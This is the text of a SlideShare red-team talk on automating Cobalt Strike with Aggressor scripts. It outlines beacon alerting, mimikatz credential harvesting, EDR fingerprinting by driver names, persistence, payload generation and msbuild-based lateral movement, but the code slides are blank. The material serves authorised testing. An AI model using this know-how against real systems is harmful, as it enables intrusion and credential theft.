SlideShare a Scribd company logo

Aggressive Autonomous Actions - Operating with Automation

C
CTruncer

This talk speaks to Aggressor, which is a scripting language that comes with Cobalt Strike. We've created or captured other public scripts into a single repository that shows how aggressor, and automation, can be used in every part of a red team or pen test. https://github.com/FortyNorthSecurity/AggressorAssessor

Technology
1 of 110
Download to read offline
Aggressive Autonomous Actions – Operating with Automation @ChrisTruncer & @r3dQu1nn
#whoami @ChrisTruncer ▸ Sys admin turned red teamer ▸ Florida State Seminole ▸ Co-Founder and Red Team Lead of FortyNorth Security ▸ Open Source Developer ▹ Veil-Framework ▹ WMImplant ▹ EyeWitness ▹ ...and more 2
#whoami @r3dQu1nn ▸ Sys/Net Admin turned Red Teamer/Pen Tester ▸ Previous: ▹ IT in the Navy for 9 years ▹ Navy Red Team Technical Lead ▸ Current: ▹ Red Team Security Consultant for Mandiant ▹ PowerShell Reverse Engineer ▸ Glorified Script Kiddie/Noobie ▹ https://github.com/harleyQu1nn/AggressorScripts 3
What’s This Talk About? ▸ Automation ▸ Aggressor ▹ Event driven language ▸ Events that we might care about ▸ Assessment/Attack lifecycle ▸ Where can automation help? ▸ Demos ▸ Links 4
This is NOT About… ▸ Automating Red Teams ▸ Automating Pen Testing ▸ There’s something to be said about the human mind analyzing the problem ▹ What if an exploit fails once, but runs the second time? ▹ How does automation account for this? ▹ Can it always identify the root cause? ▸ This isn’t SKYNET for offensive work 5 https://ih1.redbubble.net/image.412212290.3664/flat,800x800,075,f.jpg
Automation What’s our expectation of it? 6
Automation ▸ Automation is useful for tasks ▹ Tasks that don’t require interaction ▹ Doesn’t need human processing ▸ At some level, we’re lazy ▹ Why manually do something if we can automate it? ▸ Trivial tasks are prime candidates ▹ Don’t require intensive analysis, if any ▸ How long will you have that initial access? ▹ Do you have the right permissions to install persistence? ▹ Can you install persistence fast enough before the victim user logs off? ▹ Automation can help us accomplish these much faster 7
Automation ▸ There are additional benefits beyond letting us sit and watch something do our job J ▸ Ensure a uniform process is always followed ▹ You can build out protection mechanisms that keep you from doing something ▸ Prevent user error ▹ Rather than fat fingering a parameter/command, automation can ensure you always run it correctly 8
Automation ▸ How can red teams/or pen testers use automation on their tests ▹ Talk is cheap – what’s an easy way to implement? ▸ Open Source ▹ Metasploit resource scripts are a good option ▸ How do we do it? ▹ We’re a Cobalt Strike shop ▹ Scripts and code we reference/release will use Aggressor 9 https://www.cobaltstrike.com/images/art/hacker_small.png
Aggressor What is it? 10
Aggressor – What is it? ▸ Aggressor is a scripting language built into Cobalt Strike ▹ Since version 3.0 ▸ It is based on the language Sleep ▸ Aggressor lets you automate operator actions, manipulate data, generate reports, etc. ▸ Aggressor isn’t a standard programming language ▹ It’s an event driven language 11 https://memegenerator.net/instance/52901150/buzz-lightyear-meme-fixd-scripts-scripts-everywhere
Event Driven Language ▸ This doesn’t generate a compiled binary which you run on a computer ▸ Rather than “starting” a program, your code is triggered when a specific event is encountered ▹ Think similar to WMI events that occur after X happens ▹ Remember IRC Bots? ▸ Aggressor is driven by events that happen while it is running ▹ These are clearly related to actions that occurs while compromising a system 12
Aggressor – The Core ▸ Aggressor is based on the language Sleep ▹ http://sleep.dashnine.org/manual/index.html ▸ Sleep is a “java-based scripting language heavily inspired by Perl” ▸ Aggressor is an additional set of exposed functions for extending Cobalt Strike and its associated functionality ▹ Extending can also mean creating automation for your requirements 13 https://www.amazon.com/gp/product/143822723X?ie=UTF8&tag=slejavscrlan- 20&linkCode=as2&camp=1789&creative=9325&creativeASIN=143822723X
Aggressor – The Core ▸ Aggressor has the ability to interact with Cobalt Strike, Beacons, and data such as: ▹ Running commands within a Beacon, interpreting results, and making a decision ▹ Interacting with downloaded screenshots or keylogged data ▹ Modify sites hosted by Cobalt Strike ▹ Interact with credentials stored on your team server ▹ Develop custom reports for your customers, and more… 14
Aggressor Scripting How can you interact with Aggressor? 15
Aggressor Scripting ▸ Aggressor scripting utilizes different functionality to enable its developers ▸ Events – Aggressor Events initiates and runs your code when a specific condition occurs ▸ Functions – Allow you to run “checks”, perform an action locally, or run a command within Beacon - this is the mechanism for performing an action ▸ Hooks – Can allow you to generate pop-up menus ▸ The Data Model – These are different data repositories that you can manipulate 16
Aggressor Events ▸ There are triggerable events for almost everything you could wish with Aggressor ▸ beacon_initial – This monitors for new beacons checking in to your team server ▸ event_join – This event occurs when a new user connects to your team server ▸ heartbeat_* - This event occurs every X seconds or minutes ▸ ssh_initial – As new ssh connections check in, this event will fire 17
Aggressor Events ▸ Remember how your DNS beacons first check in, but with no data? ▸ beacon_initial_empty – This event triggers when the team server receives an empty beacon ▸ One of the first things people may do is type “checkin” and/or set the “mode” ▹ Save yourself the step! 18 https://lh4.googleusercontent.com/TJdG-5- 4YzBK9MuoaiNqO5k1gaCRtBZ181KXNb1pvLZbWTj6N1Hi-T9GcHWuwOIQNpvekw0swJ0D- mTouZMb4h0mYyNe0GRFqRuF-SwfM42u7n5TPLi0cuwsENqPB4zVSa0ioprJ
Aggressor Events ▸ Events expose access to different objects depending on the event ▹ beacon_initial – This will provide a handle into the individual beacon checking in ▹ This is how you can have an individual beacon perform an action ▹ Heartbeat_* - exposes nothing, but you can use a function to iterate over all beacons ▹ This provides you access to them 19
Aggressor Events ▸ There are a large number of events that you can use to trigger your code ▸ Events are available here - https://www.cobaltstrike.com/aggressor- script/events.html ▸ You can’t create your own custom events ▹ This part isn’t user-expandable ▸ However, you can always ask if you can think of a useful trigger 20
Aggressor Functions ▸ Functions are the “code” associated with your Aggressor Script ▸ Functions dictate the actions that you will perform once your trigger is activated ▸ Your code isn’t limited to what you see listed on the Aggressor function page ▸ Aggressor is based on Sleep, right? ▸ Your code will likely be a combination of Aggressor and Sleep 21
Aggressor Functions ▸ Functions include essentially every action that you can conduct within Beacon ▹ bpowershell_import – Imports a PowerShell script within a beacon ▹ bps – Performs a process listing on the targeted beacon ▹ blogonpasswords – Runs the mimikatz logonpasswords command ▹ bls – Lists all files in a specific directory ▹ bsetenv – Sets an environmental variable on the current beacon 22
Aggressor Functions ▸ It also includes “metafunctions” with interact and provide results based on Beacon metadata ▹ -is64 – This function will return true if the Beacon is running in a x64 process ▹ -isadmin – This returns true if the Beacon is running with admin rights ▹ -isssh – This returns true if the active session is a SSH session 23
Aggressor Functions ▸ You also have the ability to interact with Cobalt Strike (rather than Beacon) and manipulate data through Aggressor ▹ gzip – Gzip a string ▹ Base64_decode – Base64 decode a string ▹ openfilebrowser – Opens the file browser interface for a beacon ▹ openScreenshotBrowser – Opens the screenshot tab ▹ str_encode – Encodes a string in the specified encoding format 24
Aggressor Sample ▸ Let’s piece some of this together in a sample scenario ▸ You’ve compromised a Windows jump-box used by admins/users ▸ You were able to escalate privileges ▸ You’re interested in capturing passwords from users regularly logging in to the system ▸ How can Aggressor help? 25
26
27
28
29
30
31
32
33
Applied Automation – A Phishing Tale What steps can leverage automation? 34
A Phishing Tale ▸ What’s likely the most prevalent method of gaining access into an environment? ▸ Phishing! ▸ This is a time intensive process ▹ Generally requires developing a scenario for your customer ▹ Writing custom malware for your customer and scenario ▹ Developing domain reputation ▹ Etc. 35 http://2.bp.blogspot.com/_3zyldbmlRcQ/SFHr8lUkWpI/AAAAAAAAACg/KOLMVHuSY- g/s320/_40998639_net_phishingcartoon203.gif
A Phishing Tale ▸ Eventually, you’ve fired your first salvo and have started phishing ▸ If you’re lucky, your first target opens your e-mail and runs your malware ▸ However, this isn’t always the case ▹ It might take a few people ▹ If you’re sending every 15-30 minutes, time adds up ▸ What if you go grab a drink, are watching a different screen, etc. ▹ Do you see your incoming Beacon? 36https://i.pinimg.com/736x/7a/23/fb/7a23fb0506b89f26b01734d6f2ca499d--cartoons.jpg
A Phishing Tale ▸ One of the worst feelings can be coming back to your system and seeing you missed a callback ▸ It’s also great to know right when your Beacon arrives ▸ Aggressor can help ▹ Let’s look into the correct trigger ▹ There’s publicly available code that sends text messages via e-mail ▹ Sleep can let us run an existing script 37https://i.pinimg.com/736x/82/dc/f8/82dcf869638e2e912822cb51aafdc3bb--stupid-stuff-nerd-stuff.jpg
38
39
40
41
42
43
44
45
46
47
Applied Automation – Endpoint Protection What steps can leverage automation? 48
Identifying EDR ▸ Now that we’ve been alerted to our beacon, we might want to recon it ▸ What sort of data are we interested in? ▹ Sky’s the limit ▹ Network Connections/Interfaces ▹ Mapped Drives ▹ Local Admin Rights ▹ Etc. ▸ What about end point protection software/defenses and its settings? 49
Identifying EDR ▸ Most EDR products install minifilter drivers/.sys files ▸ Installed to %SystemRoot%System32drivers or %SystemRoot%System32DriverStoreFileRepository ▹ Minifilter altitudes are allocated by Microsoft and are publicly listed ▹ https://docs.microsoft.com/en-us/windows- hardware/drivers/ifs/allocated-altitudes ▹ This document associates minifilter drivers with vendor names 50
Identifying EDR ▸ Why is this important and how can we use this? ▹ If the EDR product is not using the cloud based option we can identify the minifilter driver and match it to the company name ▹ This process can be automated using Aggressor ▹ Gives Red Teamers awareness of what they are up against before executing commands ▸ How can this be automated? ▹ Cobalt Strike's Beacon has a built-in 'ls' command we can use ▹ This built-in 'ls' command uses Win32 API's to list a directory (more stealthy than using dir or powershell) 51
Identifying EDR ▸ Does the built-in 'ls' command have documentation?? ▹ https://www.cobaltstrike.com/aggressor- script/functions.html#bls 52
Identifying EDR ▸ List out the driver directories and parse the results with conditional statements to determine what EDR is present ▹ Define a static array of .sys files ▹ Store the 'ls' command results in an array ▹ Parse the results array and do exact matching to determine the proper vendor information ▹ Profit ▸ We can also identify other AV products and Admin Tools present using the 'ps' built-in beacon command and matching on the process name 53
Identifying EDR 54
Identifying EDR 55
Identifying EDR 56
Identifying EDR 57
58
59
Applied Automation – Persistence What steps can leverage automation? 60
Persisting ▸ We’ve found minimal EDR software, or exclusions which we can exploit to maintain access ▸ Persistence might be the next step we want to take (depending on previous results) ▸ Automating persistence is something we hesitate on doing ▸ Let’s have this be a combination of manual analysis and Aggressor 61
Persisting ▸ There’s a couple different ways to persist depending on the level of access ▹ Registry Key ▹ Scheduled Task ▹ WMI Persistence ▸ Rather than doing this all from the command line, let’s generate a pop-up for ease of use! 62
63
64
65
66
67
68
69
70
76
77
Applied Automation – Generating Payloads What steps can leverage automation? 78
Generating Payloads ▸ Payload generation is another crucial step in Red Team engagements and are used for many different reasons ▹ Initial Access ▹ Lateral Movement ▹ Persistence ▹ Obfuscation/Encoding/AWL Bypass ▸ Beneficial for Blue Team as well! ▹ Signature based identifiers/IOCs ▹ Test detection capabilities ▹ Payload sizes/types 79
Generating Payloads ▸ What types of payloads can we generate? ▹ HTTP ▹ HTTPS ▹ SMB ▹ DNS ▸ How do they work and how are they generated? ▹ Staged vs Stageless (S) ▹ Based off listener information, malleable profile, architecture selection (x64/x86) ▹ Attacks -> Packages menu options 80
Generating Payloads ▸ How can we automate payload generation using Aggressor? ▹ Utilize dialog API with drow_listener ▹ artifact/artifact_stageless functions 81 https://www.cobaltstrike.com/aggressor-script/functions.html#dialog
Generating Payloads 82 https://www.cobaltstrike.com/aggressor-script/functions.html#drow_listener
Generating Payloads 83 https://www.cobaltstrike.com/aggressor-script/functions.html#artifact https://www.cobaltstrike.com/aggressor-script/functions.html#artifact_stageless
84
85
86
Applied Automation – Lateral Movement What steps can leverage automation? 87
Lateral Movement ▸ Lateral movement is a vital part of every engagement and can be approached in different ways ▹ What value can we add if we show successful pivoting inside a network? ▹ 9 times out of 10 we need to move laterally to accomplish our objectives ▸ Can we automate this methodology? ▹ How can we use Aggressor Scripts to enhance lateral movement? 88
Lateral Movement ▸ Built-in methods of lateral movement inside of beacon ▹ wmi ▹ psexec/psexec_psh ▹ winrm ▸ All of these methods invoke a PowerShell one-liner based on the listener selection ▹ Good for quick and easy lateral movement ▹ Bad for staying stealthy and avoiding the use of PowerShell/PsExec 89
Lateral Movement ▸ Let's use Aggressor to build out a newer technique of Lateral Movement ▸ Focus on using unmanaged powershell with msbuild ▸ Set global variables to help generate the xml file ▸ Functions that we need to utilize: ▹ alias ▹ beacon_command_register ▹ bupload_raw ▹ bpowerpick ▹ exec 90
Lateral Movement 91
Lateral Movement ▸ Building out our alias commands with beacon_command_register ▹ remote_msbuild_script ▹ remote_msbuild_cmd 92
Lateral Movement 93
Lateral Movement 94
Lateral Movement 95
Lateral Movement 96
Lateral Movement 97
Lateral Movement 98
Lateral Movement ▸ Let's run through the other alias command (remote_msbuild_cmd) and use similar code with minor differences 99
Lateral Movement 100
Lateral Movement 101
102
Applied Automation – Report Generation What steps can leverage automation? 103
Reporting ▸ Reporting is part of every assessment and it should be done right ▹ What value are we if we can hack our customers but can’t convey what we did, risk remediations, etc? ▸ There are steps you can take to make reporting more efficient ▹ Develop approved finding language ▹ Develop reporting templates ▹ Automate generating commonly requested information 104
Reporting ▸ Let’s tackle that last bullet point ▹ Automate generating commonly requested information ▸ What’s something that our customers ALWAYS ask? ▹ What computers were compromised? ▹ What accounts were compromised? ▸ Let’s create a report generating function which captures this information! 105 https://vignette.wikia.nocookie.net/cryptidz/images/c/c6/Why_Not_Zoidberg.jpg/revision/latest?cb =20160219063637
106
107
108
Where to get this? ▸ We just covered a lot of different code ▸ Aggregate everything within a central repo ▹ This is not all our code ▹ It’s some of the scripts we use the most in one area ▸ https://github.com/FortyNorthSecurity/Aggressor Assessor ▹ Get all of the code here! 109
▸ Aggregate everything within a central repo ▹ This is not all our code ▹ It’s some of the scripts we use the most in one area ▸ https://github.com/FortyNorthSecurity/AggressorAsses sor ▹ Get all of the code here! @ChrisTruncer ▹ https://www.fortynorthsecurity.com @ r3dQu1nn ▹ https://github.com/harleyQu1nn/AggressorScripts 110 Thanks!

Recommended

BlackHat USA 2019 - WMImplant: An Offensive Use Case of WMI
BlackHat USA 2019 - WMImplant: An Offensive Use Case of WMIBlackHat USA 2019 - WMImplant: An Offensive Use Case of WMI
BlackHat USA 2019 - WMImplant: An Offensive Use Case of WMI
CTruncer
 
Android security in depth - extended
Android security in depth - extendedAndroid security in depth - extended
Android security in depth - extended
Sander Alberink
 
Generating report
Generating reportGenerating report
Generating report
giltek09
 
It Works On Dev
It Works On DevIt Works On Dev
It Works On Dev
marcelesser
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat Security Conference
 
RVASec AWS Survival Guide 2.0
RVASec AWS Survival Guide 2.0RVASec AWS Survival Guide 2.0
RVASec AWS Survival Guide 2.0
Ken Johnson
 
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...
enigma0x3
 

Recommended

BlackHat USA 2019 - WMImplant: An Offensive Use Case of WMI
BlackHat USA 2019 - WMImplant: An Offensive Use Case of WMIBlackHat USA 2019 - WMImplant: An Offensive Use Case of WMI
BlackHat USA 2019 - WMImplant: An Offensive Use Case of WMI
CTruncer
 
Android security in depth - extended
Android security in depth - extendedAndroid security in depth - extended
Android security in depth - extended
Sander Alberink
 
Generating report
Generating reportGenerating report
Generating report
giltek09
 
It Works On Dev
It Works On DevIt Works On Dev
It Works On Dev
marcelesser
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat v17 || “_____ Is Not a Security Boundary." Things I Have Learned and...
BlueHat Security Conference
 
RVASec AWS Survival Guide 2.0
RVASec AWS Survival Guide 2.0RVASec AWS Survival Guide 2.0
RVASec AWS Survival Guide 2.0
Ken Johnson
 
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...
“_____ Is Not a Security Boundary: Things I Have Learned and Things That Have...
enigma0x3
 
Us 17-krug-hacking-severless-runtimes
Us 17-krug-hacking-severless-runtimesUs 17-krug-hacking-severless-runtimes
Us 17-krug-hacking-severless-runtimes
Ravishankar Somasundaram
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while Persisting
CTruncer
 
Grunt training deck
Grunt training deckGrunt training deck
Grunt training deck
James Ford
 
Adversarial Post-Ex: Lessons From The Pros
Adversarial Post-Ex: Lessons From The ProsAdversarial Post-Ex: Lessons From The Pros
Adversarial Post-Ex: Lessons From The Pros
Justin Warner
 
Adversarial Post Ex - Lessons from the Pros
Adversarial Post Ex - Lessons from the ProsAdversarial Post Ex - Lessons from the Pros
Adversarial Post Ex - Lessons from the Pros
sixdub
 
Up is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and RightUp is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and Right
enigma0x3
 
XP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsXP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applications
Vlad Fedosov
 
Continuous Integration using Cruise Control
Continuous Integration using Cruise ControlContinuous Integration using Cruise Control
Continuous Integration using Cruise Control
elliando dias
 
[CB16] About the cyber grand challenge: the world’s first all-machine hacking...
[CB16] About the cyber grand challenge: the world’s first all-machine hacking...[CB16] About the cyber grand challenge: the world’s first all-machine hacking...
[CB16] About the cyber grand challenge: the world’s first all-machine hacking...
CODE BLUE
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Yevgeniy Brikman
 
apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...
apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...
apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...
apidays
 
GruntJS
GruntJSGruntJS
GruntJS
Predhin Sapru
 
Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the Wild
CTruncer
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Rob Fuller
 
SEC303 Automating Security in cloud Workloads with DevSecOps
SEC303 Automating Security in cloud Workloads with DevSecOpsSEC303 Automating Security in cloud Workloads with DevSecOps
SEC303 Automating Security in cloud Workloads with DevSecOps
Amazon Web Services
 
Fluent 2018: When third parties stop being polite... and start getting real
Fluent 2018: When third parties stop being polite... and start getting realFluent 2018: When third parties stop being polite... and start getting real
Fluent 2018: When third parties stop being polite... and start getting real
Akamai Developers & Admins
 
When Third Parties Stop Being Polite... and Start Getting Real
When Third Parties Stop Being Polite... and Start Getting RealWhen Third Parties Stop Being Polite... and Start Getting Real
When Third Parties Stop Being Polite... and Start Getting Real
Nicholas Jansma
 
Worse Is Better, for Better or for Worse
Worse Is Better, for Better or for WorseWorse Is Better, for Better or for Worse
Worse Is Better, for Better or for Worse
Kevlin Henney
 
BSides Iowa 2018: Windows COM: Red vs Blue
BSides Iowa 2018: Windows COM: Red vs BlueBSides Iowa 2018: Windows COM: Red vs Blue
BSides Iowa 2018: Windows COM: Red vs Blue
Andrew Freeborn
 
You only have to change on thing to do the DevOps, everything
You only have to change on thing to do the DevOps, everythingYou only have to change on thing to do the DevOps, everything
You only have to change on thing to do the DevOps, everything
Ken Mugrage
 
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
CTruncer
 
AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0
CTruncer
 

More Related Content

Similar to Aggressive Autonomous Actions - Operating with Automation

Us 17-krug-hacking-severless-runtimes
Us 17-krug-hacking-severless-runtimesUs 17-krug-hacking-severless-runtimes
Us 17-krug-hacking-severless-runtimes
Ravishankar Somasundaram
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while Persisting
CTruncer
 
Grunt training deck
Grunt training deckGrunt training deck
Grunt training deck
James Ford
 
Adversarial Post-Ex: Lessons From The Pros
Adversarial Post-Ex: Lessons From The ProsAdversarial Post-Ex: Lessons From The Pros
Adversarial Post-Ex: Lessons From The Pros
Justin Warner
 
Adversarial Post Ex - Lessons from the Pros
Adversarial Post Ex - Lessons from the ProsAdversarial Post Ex - Lessons from the Pros
Adversarial Post Ex - Lessons from the Pros
sixdub
 
Up is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and RightUp is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and Right
enigma0x3
 
XP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsXP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applications
Vlad Fedosov
 
Continuous Integration using Cruise Control
Continuous Integration using Cruise ControlContinuous Integration using Cruise Control
Continuous Integration using Cruise Control
elliando dias
 
[CB16] About the cyber grand challenge: the world’s first all-machine hacking...
[CB16] About the cyber grand challenge: the world’s first all-machine hacking...[CB16] About the cyber grand challenge: the world’s first all-machine hacking...
[CB16] About the cyber grand challenge: the world’s first all-machine hacking...
CODE BLUE
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Yevgeniy Brikman
 
apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...
apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...
apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...
apidays
 
GruntJS
GruntJSGruntJS
GruntJS
Predhin Sapru
 
Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the Wild
CTruncer
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Rob Fuller
 
SEC303 Automating Security in cloud Workloads with DevSecOps
SEC303 Automating Security in cloud Workloads with DevSecOpsSEC303 Automating Security in cloud Workloads with DevSecOps
SEC303 Automating Security in cloud Workloads with DevSecOps
Amazon Web Services
 
Fluent 2018: When third parties stop being polite... and start getting real
Fluent 2018: When third parties stop being polite... and start getting realFluent 2018: When third parties stop being polite... and start getting real
Fluent 2018: When third parties stop being polite... and start getting real
Akamai Developers & Admins
 
When Third Parties Stop Being Polite... and Start Getting Real
When Third Parties Stop Being Polite... and Start Getting RealWhen Third Parties Stop Being Polite... and Start Getting Real
When Third Parties Stop Being Polite... and Start Getting Real
Nicholas Jansma
 
Worse Is Better, for Better or for Worse
Worse Is Better, for Better or for WorseWorse Is Better, for Better or for Worse
Worse Is Better, for Better or for Worse
Kevlin Henney
 
BSides Iowa 2018: Windows COM: Red vs Blue
BSides Iowa 2018: Windows COM: Red vs BlueBSides Iowa 2018: Windows COM: Red vs Blue
BSides Iowa 2018: Windows COM: Red vs Blue
Andrew Freeborn
 
You only have to change on thing to do the DevOps, everything
You only have to change on thing to do the DevOps, everythingYou only have to change on thing to do the DevOps, everything
You only have to change on thing to do the DevOps, everything
Ken Mugrage
 

Similar to Aggressive Autonomous Actions - Operating with Automation (20)

Us 17-krug-hacking-severless-runtimes
Us 17-krug-hacking-severless-runtimesUs 17-krug-hacking-severless-runtimes
Us 17-krug-hacking-severless-runtimes
 
The Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while PersistingThe Supporting Role of Antivirus Evasion while Persisting
The Supporting Role of Antivirus Evasion while Persisting
 
Grunt training deck
Grunt training deckGrunt training deck
Grunt training deck
 
Adversarial Post-Ex: Lessons From The Pros
Adversarial Post-Ex: Lessons From The ProsAdversarial Post-Ex: Lessons From The Pros
Adversarial Post-Ex: Lessons From The Pros
 
Adversarial Post Ex - Lessons from the Pros
Adversarial Post Ex - Lessons from the ProsAdversarial Post Ex - Lessons from the Pros
Adversarial Post Ex - Lessons from the Pros
 
Up is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and RightUp is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and Right
 
XP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applicationsXP Days 2019: First secret delivery for modern cloud-native applications
XP Days 2019: First secret delivery for modern cloud-native applications
 
Continuous Integration using Cruise Control
Continuous Integration using Cruise ControlContinuous Integration using Cruise Control
Continuous Integration using Cruise Control
 
[CB16] About the cyber grand challenge: the world’s first all-machine hacking...
[CB16] About the cyber grand challenge: the world’s first all-machine hacking...[CB16] About the cyber grand challenge: the world’s first all-machine hacking...
[CB16] About the cyber grand challenge: the world’s first all-machine hacking...
 
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutionsCloud adoption fails - 5 ways deployments go wrong and 5 solutions
Cloud adoption fails - 5 ways deployments go wrong and 5 solutions
 
apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...
apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...
apidays LIVE New York - Navigating the Sea of Javascript Tools to Discover Sc...
 
GruntJS
GruntJSGruntJS
GruntJS
 
Ever Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the WildEver Present Persistence - Established Footholds Seen in the Wild
Ever Present Persistence - Established Footholds Seen in the Wild
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting ClassThe Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
SEC303 Automating Security in cloud Workloads with DevSecOps
SEC303 Automating Security in cloud Workloads with DevSecOpsSEC303 Automating Security in cloud Workloads with DevSecOps
SEC303 Automating Security in cloud Workloads with DevSecOps
 
Fluent 2018: When third parties stop being polite... and start getting real
Fluent 2018: When third parties stop being polite... and start getting realFluent 2018: When third parties stop being polite... and start getting real
Fluent 2018: When third parties stop being polite... and start getting real
 
When Third Parties Stop Being Polite... and Start Getting Real
When Third Parties Stop Being Polite... and Start Getting RealWhen Third Parties Stop Being Polite... and Start Getting Real
When Third Parties Stop Being Polite... and Start Getting Real
 
Worse Is Better, for Better or for Worse
Worse Is Better, for Better or for WorseWorse Is Better, for Better or for Worse
Worse Is Better, for Better or for Worse
 
BSides Iowa 2018: Windows COM: Red vs Blue
BSides Iowa 2018: Windows COM: Red vs BlueBSides Iowa 2018: Windows COM: Red vs Blue
BSides Iowa 2018: Windows COM: Red vs Blue
 
You only have to change on thing to do the DevOps, everything
You only have to change on thing to do the DevOps, everythingYou only have to change on thing to do the DevOps, everything
You only have to change on thing to do the DevOps, everything
 

More from CTruncer

Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
Windows 10 - Endpoint Security Improvements and the Implant Since Windows 2000
CTruncer
 
AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0AntiVirus Evasion Reconstructed - Veil 3.0
AntiVirus Evasion Reconstructed - Veil 3.0
CTruncer
 
Bringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirusBringing Down the House - How One Python Script Ruled Over AntiVirus
Bringing Down the House - How One Python Script Ruled Over AntiVirus
CTruncer
 
A Battle Against the Industry - Beating Antivirus for Meterpreter and More
A Battle Against the Industry - Beating Antivirus for Meterpreter and MoreA Battle Against the Industry - Beating Antivirus for Meterpreter and More
A Battle Against the Industry - Beating Antivirus for Meterpreter and More
CTruncer
 
The Art of AV Evasion - Or Lack Thereof
The Art of AV Evasion - Or Lack ThereofThe Art of AV Evasion - Or Lack Thereof
The Art of AV Evasion - Or Lack Thereof
CTruncer
 
Higher Level Malware
Higher Level MalwareHigher Level Malware
Higher Level Malware
CTruncer
 
